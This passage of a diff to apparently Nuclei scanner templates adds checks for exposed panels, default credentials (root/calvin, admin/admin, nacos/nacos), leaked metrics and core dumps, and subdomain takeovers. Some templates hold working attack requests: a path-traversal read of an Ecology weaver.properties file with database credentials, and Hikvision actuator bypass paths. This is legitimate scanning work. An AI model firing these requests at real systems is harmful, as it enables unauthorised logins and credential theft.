   description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
   reference:
@@ -11,7 +11,7 @@ info:
     cwe-id: CWE-798
   tags: dell,idrac,default-login
   metadata:
-    max-request: 1
+    max-request: 2
 
 http:
   - raw:
@@ -26,7 +26,8 @@ http:
         - root
       password:
         - calvin
-    attack: pitchfork
+        - root
+    attack: clusterbomb
 
     headers:
       Content-Type: "application/x-www-form-urlencode"

http/default-logins/feiyuxing/feiyuxing-default-login.yaml

@@ -0,0 +1,49 @@
+id: feiyuxing-default-login
+
+info:
+  name: Feiyuxing Enterprise-Level Management System - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    Attackers can log in through admin:admin, check the system status, and configure the device.
+  reference:
+    - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
+  tags: feiyuxing,default-login,iot
+
+http:
+  - raw:
+      - |
+        POST /send_order.cgi?parameter=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        {"username":"{{username}}","password":"{{password}}"}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"msg":"ok"'
+          - '"type":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'hash_key='
+
+      - type: status
+        status:
+          - 200

http/default-logins/frps/frp-default-login.yaml

@@ -32,7 +32,7 @@ http:
 
       - type: word
         words:
-          - "proxies"
+          - '"proxies":'
         part: body
         condition: and
 

http/default-logins/nacos/nacos-default-login.yaml

@@ -0,0 +1,57 @@
+id: nacos-default-login
+
+info:
+  name: Alibaba Nacos - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    The default username and password for Nacos are both nacos.
+  metadata:
+    fofa-query: title=="Nacos"
+    max-request: 2
+    verified: true
+  tags: nacos,default-login,alibaba
+
+http:
+  - raw:
+      - |
+        POST /v1/auth/users/login  HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Nacos-Server
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /nacos/v1/auth/users/login  HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Nacos-Server
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - nacos
+      password:
+        - nacos
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"accessToken":'
+          - '"username":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/aspcms-backend-panel.yaml

@@ -0,0 +1,40 @@
+id: aspcms-backend-panel
+
+info:
+  name: Aspcms Backend Panel - Detect
+  author: SleepingBag945
+  severity: info
+  description: |
+    ASPcms /plug/oem/AspCms_OEMFun.asp leak backend url.
+  reference:
+    - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json
+  metadata:
+    fofa-query: app="ASPCMS"
+    max-request: 2
+    verified: true
+  tags: panel,login,aspcms,admin
+
+http:
+  - raw:
+      - |
+        GET /plug/oem/AspCms_OEMFun.asp  HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET {{path}}  HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        internal: true
+        name: path
+        group: 1
+        regex:
+          - "top.location.href='(.*?)'"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && contains(body_1,"alert(")'
+          - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")'
+        condition: and

http/exposed-panels/dell-bmc-panel-detect.yaml

@@ -0,0 +1,33 @@
+id: dell-bmc-panel
+
+info:
+  name: Dell BMC Panel - Detect
+  author: megamansec
+  severity: info
+  description: |
+    Dell BMC web panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  metadata:
+    max-request: 1
+    shodan-query: title:"Dell Remote Management Controller"
+    verified: true
+  tags: panel,bmc,dell,login
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Dell Remote Management Controller</title>"
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/greenbone-panel.yaml

@@ -0,0 +1,30 @@
+id: greenbone-panel
+
+info:
+  name: Greenbone Security Assistant Panel  - Detect
+  author: pbuff07
+  severity: info
+  description: |
+    Greenbone Security Assistant Web Panel is detected
+  metadata:
+    max-request: 1
+    verified: true
+    zoomeye-query: title:"Greenbone Security Assistant"
+    shodan-query: http.title:"Greenbone Security Assistant"
+  tags: panel,greenbone,login
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Greenbone Security Assistant</title>"
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/kasm-login-panel.yaml

@@ -0,0 +1,47 @@
+id: kasm-login-panel
+
+info:
+  name: Kasm Login Panel - Detect
+  author: lum8rjack
+  severity: info
+  description: |
+    Kasm workspaces login panel was detected.
+  reference:
+    - https://kasmweb.com/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+  metadata:
+    max-request: 2
+    shodan-query: http.favicon.hash:-2144699833
+    verified: true
+  tags: panel,kasm,login,detect
+
+http:
+  - raw:
+      - |
+        GET /#/login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /api/login_settings HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"token":null,"username":null}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Kasm</title>'
+          - 'content="Kasm Server'
+          - 'content="Kasm Technologies'
+          - '"html_title": "Kasm'
+        condition: or
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/metasploit-panel.yaml

@@ -0,0 +1,34 @@
+id: metasploit-panel
+
+info:
+  name: Metasploit Panel - Detect
+  author: lu4nx
+  severity: info
+  description: |
+    Metasploit Web Panel is detected
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  metadata:
+    max-request: 1
+    verified: true
+    zoomeye-query: title:'Metasploit'
+    shodan-query: http.title:"metasploit"
+  tags: panel,metasploit,login
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Metasploit</title>'
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/oracle-opera-login.yaml

@@ -1,30 +1,34 @@
 id: oracle-opera-login
 
 info:
-  name: Oracle Opera - Login
-  author: DhiyaneshDK
+  name: Oracle Opera Login - Detect
+  author: DhiyaneshDK,righettod
   severity: info
   classification:
     cwe-id: CWE-200
   metadata:
-    max-request: 1
+    max-request: 2
+    shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do"
     verified: true
-    shodan-query: title:"Oracle Opera"
   tags: panel,opera,oracle,detect
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}"
+      - "{{BaseURL}}/OperaLogin/Welcome.do"
 
     host-redirects: true
     max-redirects: 2
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - '<title>Oracle, OPERA</title>'
+          - '<title>OPERA Login'
+        condition: or
 
       - type: status
         status:

http/exposures/configs/prometheus-metrics.yaml

@@ -5,22 +5,24 @@ info:
   author: dhiyaneshDK,philippedelteil
   severity: medium
   description: Prometheus metrics page was detected.
+  reference:
+    - https://github.com/prometheus/prometheus
+    - https://hackerone.com/reports/1026196
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-  reference:
-    - https://github.com/prometheus/prometheus
-    - https://hackerone.com/reports/1026196
-  tags: exposure,prometheus,hackerone,config
   metadata:
-    max-request: 1
+    max-request: 2
+  tags: exposure,prometheus,hackerone,config
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/metrics"
+      - "{{BaseURL}}/api/metrics"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word

http/exposures/files/core-dump.yaml

@@ -0,0 +1,22 @@
+id: core-dump
+
+info:
+  name: Exposed Core Dump - File Disclosure
+  author: kazet
+  severity: medium
+  reference:
+    - https://github.com/hannob/snallygaster/blob/4c5a9b54501f64da96787c2a2e3a12ce2e09c1ab/snallygaster#L295
+  metadata:
+    max-request: 1
+    verified: true
+  tags: exposure,files,core-dump
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/core"
+
+    matchers:
+      - type: regex
+        regex:
+          - '^\x7fELF'

http/misconfiguration/chatgpt-web-unauth.yaml

@@ -0,0 +1,39 @@
+id: chatgpt-web-unauth
+
+info:
+  name: ChatGPT Web - Unauthorized Access
+  author: SleepingBag945
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="Chatgpt-web"
+  tags: chatgpt,unauth,misconfig
+
+http:
+  - raw:
+      - |
+        POST /api/session HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"status":"Success"'
+          - '"auth":false'
+          - 'ChatGPTAPI'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

http/misconfiguration/ecology-info-leak.yaml

@@ -0,0 +1,39 @@
+id: ecology-info-leak
+
+info:
+  name: Ecology  - Information Exposure
+  author: qianbenhyu
+  severity: high
+  description: |
+    The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).
+  reference:
+    - https://github.com/xinyisleep/pocscan/blob/main/%E6%B3%9B%E5%BE%AE/oa%E6%B3%9B%E5%BE%AE0day%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.py
+  metadata:
+    fofa-query: app="泛微-协同办公OA"
+    shodan-query: ecology_JSessionid
+    verified: true
+    max-request: 1
+  tags: ecology,unauth,misconfig
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ecology.password"
+          - "ecology.charset"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200

http/misconfiguration/hikivision-env.yaml

@@ -0,0 +1,56 @@
+id: hikivision-env
+
+info:
+  name: Hikvision Springboot Env Actuator - Detect
+  author: SleepingBag945
+  severity: high
+  description: |
+    The HIKVISION comprehensive security management platform has information leakage vulnerabilities, through which attackers can obtain sensitive information such as environment env for further attacks
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+    - https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20综合安防管理平台%20env%20信息泄漏漏洞.html
+  metadata:
+    max-request: 5
+    verified: true
+    shodan-query: app="HIKVISION-综合安防管理平台"
+  tags: misconfig,hikivision,springboot,env
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/artemis/env"
+      - "{{BaseURL}}/artemis-portal/artemis/env"
+      - "{{BaseURL}}/artemis/actuator/env"
+      - "{{BaseURL}}/artemis;/env;"
+      - "{{BaseURL}}/artemis/1/..;/env"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "applicationConfig"
+          - "activeProfiles"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "server.port"
+          - "local.server.port"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "application/vnd.spring-boot.actuator"
+          - "application/vnd.spring-boot.actuator.v1+json"
+          - "application/vnd.spring-boot.actuator.v2+json"
+          - "application/vnd.spring-boot.actuator.v3+json"
+        condition: or
+
+      - type: status
+        status:
+          - 200

http/misconfiguration/php-debugbar-exposure.yaml

@@ -0,0 +1,32 @@
+id: php-debugbar-exposure
+
+info:
+  name: Php Debug Bar - Exposure
+  author: ritikchaddha,pdteam
+  severity: medium
+  description: |
+    The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects.
+  reference:
+    - https://hackerone.com/reports/1883806
+    - http://phpdebugbar.com/
+    - https://github.com/maximebf/php-debugbar
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: html:"phpdebugbar"
+  tags: misconfig,php,phpdebug,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/_debugbar/open"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_1, "phpdebugbar") && contains(body, "widget")'
+          - 'contains_all(body_2, "\"utime\"","\"datetime\"","{\"id") && contains(content_type_2, "application/json")'
+        condition: or

http/misconfiguration/unauthenticated-nacos-access.yaml

@@ -1,40 +0,0 @@
-id: unauthenticated-nacos-access
-
-info:
-  name: Nacos 1.x - Authentication Bypass
-  author: taielab,pikpikcu
-  severity: critical
-  description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
-  reference:
-    - https://github.com/alibaba/nacos/issues/4593
-    - https://nacos.io/en-us/docs/auth.html
-  tags: nacos,unauth,misconfig
-  metadata:
-    max-request: 2
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
-      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
-    headers:
-      User-Agent: Nacos-Server
-
-    matchers-condition: and
-    matchers:
-
-      - type: word
-        words:
-          - "Content-Type: application/json"
-        part: header
-
-      - type: regex
-        regex:
-          - '"username":'
-          - '"password":'
-        part: body
-        condition: and
-
-      - type: status
-        status:
-          - 200

http/takeovers/aws-bucket-takeover.yaml

@@ -34,9 +34,17 @@ http:
         part: host
         words:
           - "amazonaws.com"
+          - "ks3.ksyun.com"
           - "kss.ksyun.com"
-          - "ks3-sgp.ksyun.com"
+          - "kss3.ksyun.com"
           - "ks3-cn-beijing.ksyun.com"
+          - "ks3-cn-guangzhou.ksyun.com"
+          - "ks3-cn-hk-1.ksyun.com"
+          - "ks3-cn-shanghai.ksyun.com"
+          - "ks3-jr-beijing.ksyun.com"
+          - "ks3-jr-shanghai.ksyun.com"
+          - "ks3-rus.ksyun.com"
+          - "ks3-sgp.ksyun.com"
           - "obs.jrzq.huaweicloud.com"
           - "obs.petalpay.huaweicloud.com"
           - "oss-cn-hangzhou.aliyuncs.com"

http/takeovers/lemlist-takeover.yaml

@@ -0,0 +1,31 @@
+id: lemlist-takeover
+
+info:
+  name: Lemlist - Subdomain Takeover Detection
+  author: kresec
+  severity: high
+  description: |
+    The takeover will succeed when the target domain has a cname that points to the lemlist and in their account they only customize the domain in the tracking column so in the custom page column, as an attacker, they can enter the target domain.
+  reference:
+    - https://www.lemlist.com/blog/custom-tracking-domain
+    - https://kresec.medium.com/10k-site-affected-subdomain-takeover-via-lemlist-146cd0f11883
+  metadata:
+    max-request: 1
+  tags: dns,takeover,lemlist
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - Host != ip
+
+      - type: word
+        words:
+          - "Custom domain check"
+          - "app.lemlist.com"
+        condition: and

http/technologies/drupal-detect.yaml

@@ -5,7 +5,7 @@ info:
   author: 1nf1n7y
   severity: info
   metadata:
-    max-request: 2
+    max-request: 3
     verified: true
     shodan-query: http.component:"Drupal"
   tags: tech,drupal
@@ -15,6 +15,7 @@ http:
     path:
       - "{{BaseURL}}"
       - "{{BaseURL}}/CHANGELOG.txt"
+      - "{{BaseURL}}/core/install.php"
 
     matchers-condition: or
     matchers:
@@ -29,3 +30,11 @@ http:
         part: body
         words:
           - 'content="Drupal'
+
+    extractors:
+      - type: regex
+        part: body
+        name: version_by_install
+        group: 1
+        regex:
+          - 'class="site-version">([0-9.x-]+)'

http/technologies/wordpress/plugins/ad-inserter.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200

http/technologies/wordpress/plugins/add-to-any.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200

http/technologies/wordpress/plugins/admin-menu-editor.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200

http/technologies/wordpress/plugins/advanced-custom-fields.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200

http/technologies/wordpress/plugins/akismet.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200